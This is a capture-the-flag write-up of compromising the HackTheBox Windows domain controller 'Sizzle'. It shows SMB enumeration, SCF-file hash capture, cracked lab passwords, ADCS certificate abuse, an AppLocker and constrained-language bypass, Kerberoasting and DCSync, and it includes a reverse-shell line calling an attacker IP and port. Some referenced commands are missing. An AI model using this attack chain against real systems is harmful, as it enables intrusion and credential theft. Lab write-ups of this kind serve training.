$ nmap -p- --min-rate 5000 10.129.73.156
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 00:20 EDT
Nmap scan report for 10.129.73.156
Host is up (0.0075s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49700/tcp open unknown
49713/tcp open unknown
Anonymous FTP
This machine allows for anomyous FTP access, but there's nothing present in the server:
$ ftp 10.129.73.156
Connected to 10.129.73.156.
220 Microsoft FTP Service
Name (10.129.73.156:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||56291|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
Let's move on for now, we might need this later.
HTTP
This just shows a GIF of bacon sizzling:
When viewing the page source, this is located at the /images directory, which we don't have access to. However, it does tell us this is an IIS server based on the error page:
$ smbmap -u 'guest' -p '' -H 10.129.73.156
[+] IP: 10.129.73.156:445 Name: 10.129.73.156
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
Within the Department Shares, there are loads of directories:
$ smbclient -U 'guest' '//10.129.73.156/Department Shares'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 3 11:22:32 2018
.. D 0 Tue Jul 3 11:22:32 2018
Accounting D 0 Mon Jul 2 15:21:43 2018
Audit D 0 Mon Jul 2 15:14:28 2018
Banking D 0 Tue Jul 3 11:22:39 2018
CEO_protected D 0 Mon Jul 2 15:15:01 2018
Devops D 0 Mon Jul 2 15:19:33 2018
Finance D 0 Mon Jul 2 15:11:57 2018
HR D 0 Mon Jul 2 15:16:11 2018
Infosec D 0 Mon Jul 2 15:14:24 2018
Infrastructure D 0 Mon Jul 2 15:13:59 2018
IT D 0 Mon Jul 2 15:12:04 2018
Legal D 0 Mon Jul 2 15:12:09 2018
M&A D 0 Mon Jul 2 15:15:25 2018
Marketing D 0 Mon Jul 2 15:14:43 2018
R&D D 0 Mon Jul 2 15:11:47 2018
Sales D 0 Mon Jul 2 15:14:37 2018
Security D 0 Mon Jul 2 15:21:47 2018
Tax D 0 Mon Jul 2 15:16:54 2018
Users D 0 Tue Jul 10 17:39:32 2018
ZZ_ARCHIVE D 0 Mon Jul 2 15:32:58 2018
The Users directory gives me a list of usernames to work with and perhaps ASREP-Roast:
amanda D 0 Mon Jul 2 15:18:43 2018
amanda_adm D 0 Mon Jul 2 15:19:06 2018
bill D 0 Mon Jul 2 15:18:28 2018
bob D 0 Mon Jul 2 15:18:31 2018
chris D 0 Mon Jul 2 15:19:14 2018
henry D 0 Mon Jul 2 15:18:39 2018
joe D 0 Mon Jul 2 15:18:34 2018
jose D 0 Mon Jul 2 15:18:53 2018
lkys37en D 0 Tue Jul 10 17:39:04 2018
morgan D 0 Mon Jul 2 15:18:48 2018
mrb3n D 0 Mon Jul 2 15:19:20 2018
Public D 0 Wed Sep 26 01:45:32 2018
The ZZ_Archive directory contains a lot of different files which all have the same size and edit date with different extensions.
smb: \ZZ_ARCHIVE\> ls
. D 0 Mon Jul 2 15:32:58 2018
.. D 0 Mon Jul 2 15:32:58 2018
AddComplete.pptx A 419430 Mon Jul 2 15:32:58 2018
AddMerge.ram A 419430 Mon Jul 2 15:32:57 2018
ConfirmUnprotect.doc A 419430 Mon Jul 2 15:32:57 2018
ConvertFromInvoke.mov A 419430 Mon Jul 2 15:32:57 2018
ConvertJoin.docx A 419430 Mon Jul 2 15:32:57 2018
CopyPublish.ogg A 419430 Mon Jul 2 15:32:57 2018
<TRUNCATED>
All of these folders were rather useless and contained nothing of interest. I tried ASREP-Roasting the users but to no avail as well. My thought process was that since we cannot use anything within the share, perhaps we have to put something there.
SCF File -> NTLM Hash
In another machine Driver on HTB, we had to create a .scf file that was being clicked by the user in order to capture NTLM hashes via responder. I tried the same thing here.
First, I mounted the SMB share.
$ sudo mount -t cifs '//10.129.73.156/Department Shares' ~/htb/sizzle/mnt
[sudo] password for kali:
Password for root@//10.129.73.156/Department Shares:
I started with the most out place file to try the exploit, which was the ZZ_ARCHIVE directory. Then, we can place this file within it:
There was nothing for this particular directory, and it looks like nothing was happening. So I decided to check exactly which directories I could write to. I used ChatGPT (the best tool ever) to create a quick script to do this:
# ./write.sh
Created file 'test' in directory: /home/kali/htb/sizzle/mnt/Users/Public
Created file 'test' in directory: /home/kali/htb/sizzle/mnt/ZZ_ARCHIVE
So I could also write to that Public file. I copied the test.scf file there and responder captured a hash!
We can crack this hash easily with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
1g 0:00:00:04 DONE (2023-05-26 06:26) 0.2415g/s 2757Kp/s 2757Kc/s 2757KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
However, this password cannot be used to evil-winrm in to the machine.
CertEnroll -> User Shell
With these credentials, we can actually access another share:
$ smbmap -u amanda -p Ashare1972 -H 10.129.73.156
[+] IP: 10.129.73.156:445 Name: 10.129.73.156
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
Now the CertEnroll share is available. CertEnroll is a reference to an ADCS service that provides a web platform to enroll certificates. This means that /certsrv is probably present on the web server, and visiting it requires credentials:
Using the credentials we have, we can access it:
We can try to request a certificate, and this presents us with 2 options:
Clicking on User Certificate brings us to a page requesting its key strength:
For some reason, I cannot specify the key strength in this, so we probably aren't supposed to have this functionality. In this case, we can check the advanced request form:
It appears we have to create a certificate ourselves, then use it to submit a request to be approved. I know that certificates can be used for authentication purposes, and this service is used to signed the certificates to 'make them legit'. As such, we can create a Certificate Signing Request (CSR) via openssl.
Then, we can grab the .csr contents and paste it into the box:
When submitted, we would get the option to download the certificate:
This would download a .cer file to our machine. Using this, we can try to get a shell. Googling online led me to someone's OSCP notes, and it appears it is possible to get a WinRM shell using this certificate with some Ruby code:
Using this, we can get a shell as Amanda:
Privilege Escalation
Bloodhound -> Kerberoastable
Before starting my enumeration within the machine, we can use bloodhound-python to scope what we need to do (else we'll be heading in blind).
Then, start bloodhound and neo4j, then upload the data required. I found that the user amanda has no privileges at all. Checking the Kerberoastable accounts, we find that mrlky is a possible target.
Checking the privileges of this user, we can see that they have DCSync privileges over the forest.
So that's the attack path. Normally, I would aim to Kerberoast remotely for both OPSEC reasons and also because impacket is just so easy to use. However, in our initial nmap scan, port 88 is not public facing. This means that we have to Kerberoast on the machine itself using rubeus.exe.
CLM + AppLocker -> CLM Bypass
I tried to download and execute Rubeus, but this is the error I get due to AppLocker:
Other tools like PowerView.ps1 don't work as well. The current shell that I have is extremely limited in We can check the Execution Context to confirm this:
There are 2 methods of exploitation here. One is we could run a Kerberoast Powershell script that would involve bypassing CLM. Fortunately, iRedTeam has a whole article detailing a method that involves Powershell versions.
All we need to do is specify that we want to use Powershell Version 2:
Using this method, we can run some scripts using this. However, its even better if we can get a CLM Bypassed shell. To do so, we can simply download the Invoke-PowerShellTcp shell to the machine, and then run this command:
Since we have a full shell, we don't actually need Rubeus anymore as there are plenty of Kerberoasting Powershell scripts that (hopefully) don't trigger AppLocker.
However, trying to run this gives me a weird error:
PS C:\Users\amanda\Documents>. .\Invoke-Kerberoast.ps1
PS C:\Users\amanda\Documents> Invoke-Kerberoast
PS C:\Users\amanda\Documents> Invoke-PowerShellTcp : The variable cannot be validated because the value is not a valid value fo
r the SPN variable.
At C:\Users\amanda\Documents\shell.ps1:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.9 -Port 4444
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShell
Tcp
We can follow the PowerSploit documentation to resolve this.
The above still doesn't work because it complains that we don't have theInvoke-UserImpersonation cmdlet imported. This means we have to import PowerView.ps1 as well.
After running this, a hash for the user is given to us:
Transfer this to our machine, and we can crack it easily with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt ticket_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
1g 0:00:00:04 DONE (2023-05-26 09:48) 0.2331g/s 2603Kp/s 2603Kc/s 2603KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
DCSync
Earlier, we saw that this user had DCSync privileges over the domain, so we can easily use secretsdump.py to dump the administrator hash:
Then, we can use smbexec.py to pass the hash and get an administrator shell.
